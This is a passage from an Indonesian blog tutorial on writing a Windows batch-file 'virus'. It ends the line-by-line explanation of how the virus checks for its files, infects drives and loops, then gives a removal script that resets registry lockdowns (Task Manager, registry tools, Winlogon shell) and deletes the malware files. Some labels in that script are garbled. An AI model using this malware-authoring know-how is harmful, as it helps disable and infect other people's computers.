47. ini parameter yang membuat kumpulan perintah bernama ceki yang berisikan kumpulan perintah dari baris 49-51.
48. ini perintah untuk mempertanyakan keberadaan file exploler.exe di drive c:\windows, kalo ga ada itu berarti file induk program ini berhasil (sudah) dihapus, maka akan dilanjutkan ke parameter perintah infek1 dengan perintah yang sama pada baris 3 dan 33.
49. ini perintah untuk mempertanyakan keberadaan file gambar lucu.exe di drive c:\, kalo ga ada maka bakal dilanjutin ke perintah infek2
50. ini perintah untuk mengetahui ada tidaknya drive f:\ kalo ada maka bakal dilanjutin ke perintah infek3, tapi kali ga ada bakal langsung menuju perintah selanjutnya
51. kosong
52. ini perintah untuk kembali lagi ke parameter perintah ceki, semcam looping lah…


Puuhhh………….. akhirnya, 80 baris yang panjang sekali ya penjelasannya (jangan dijawab iya!). Namanya juga belajar, bersusah-susah dululah,Oya buat kamu yang masih kurang mengerti penjelasan script diatas saya saranin agar kamu baca :

1. Buku “Pemrograman Virus dan SpyWare [uncensored]” karya Wardana, R, S.Hut terbitan Jasakom
2. Artikel tomPLIX yang judulnya “Membuat Virus dengan Perintah CMD” di situs jasakom.com
3. semua yang berhubunagn dengan registry

Masih pada keukeuh baca tulisan ini, kalau iya, gua kasih script pemulih nya deh sekalian, ga adil dong, masa ngasih penyakitnya doang! (iya ga?)
Script Pemulih nya sebagai berikut ;

1. @echo off
2. title Script Pemulih virus-virusan –rasta-Farian.B
3. echo on error resume next>c:\gila.vbs
4. echo Dim WshShell, f1, fso>>c:\gila.vbs
5. echo set WshShell = CreateObject("Wscript.Shell")>>c:\gila.vbs
6. echo set fso = CreateObject("Scripting.FileSystemObject")>>c:\gila.vbs
7. echo set f1 = fso.GetFile("c:\windows\exploler.exe")>>c:\gila.vbs
8. echo set f2 =fso.GetFile(“c:\windows\gila.vbs”)
9. echo f1.Attributes = "0">>c:\gila.vbs
10. echo f2.Attributes = “0”>>c:\gila.vbs
11. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "0", "REG_DWORD">>c:\gila.vbs
12. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools", "0", "REG_DWORD">>c:\gila.vbs
13. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrives", "0", "REG_DWORD">>c:\gila.vbs
14. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "0", "REG_DWORD">>c:\gila.vbs
15. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "0", "REG_DWORD">>c:\gila.vbs
16. echo WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr", "0", "REG_DWORD">>c:\gila.vbs
17. echo WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe", "REG_SZ">>c:\gila.vbs
18. call c:\gila.vbs
19. pause
20. Goto del1
21. kosong
22. el1
23.

24. del %systemroot%\exploler.exe pause
25. Goto del2
26.

27. for /R c:\ %%d in (legalin ganja dong by fanatiCanz.exe) do del "%%d"
28. pause
29. Goto del3
30.

31. el3
32. del c:\"gambar lucu".exe
33. pause
34.

35. el4
36. del %systemroot%\gila.vbs
37. pause

Ga banyak yang bisa dijelasin dari script diatas, kalo lo mahamin script virus(-virusannya) lo bakalan dengan mudah mengerti script diatas. Dari baris 3 sampe 16 dibikin file gila.vbs yang akan membuat normal semua key yang disebabkan program virus(-virusan) tadi. Terus di baru 17 dieksekusi file gila.vbs dan bakalan langsung menuju perintah del 1 yang berisikan perintah untuk menghapus file induk program tadi. Kalo selesai bakalan dilanjutin ke perintah del2, yang akan menghapus file legalin ganja dong by fanatiCanz.exe di seluruh folder dan seub folder di drive c:\. Terus dilajnutin keperintah selajutnya, dan seterusnya.

Script pemulih ini bisa dibuat juga dengan menggunakan notepad lalu simpan dengan extensi .bat. Untuk merasakan khasiat dari script pemulih diatas, jalankan script pemulih tersebut lalu masuk ke dalam Task manager (kan udah dipulihin, jadi task manager udah bisa di control), di dalam menu Process mastikan proses yang namanya, exploler.exe, cmd.exe (end process), setelah semua proses yang namanya CMD.exe, legalin ganja dong by fanatiCanz.exe dan proses exploler.exe dihapus, Jalankan sekali lagi script pemulihnya sampe selesai dan terakhir restart komputernya, dijamin uang kembali, setelah semua “ritual” diatas selesai, computer yang terinfek akan kembali seperti semula.

hahaha....
Sayangnya progam-progam ini tak bisa dijalankan ke autorun.
karna langsung di hapus oleh anti virus lokal. seperti smxxx. tak apalah karna membuat virus itu tidak baik. bayangi aja kalo komputer kita kena virus!!!
hohoho....

Read more »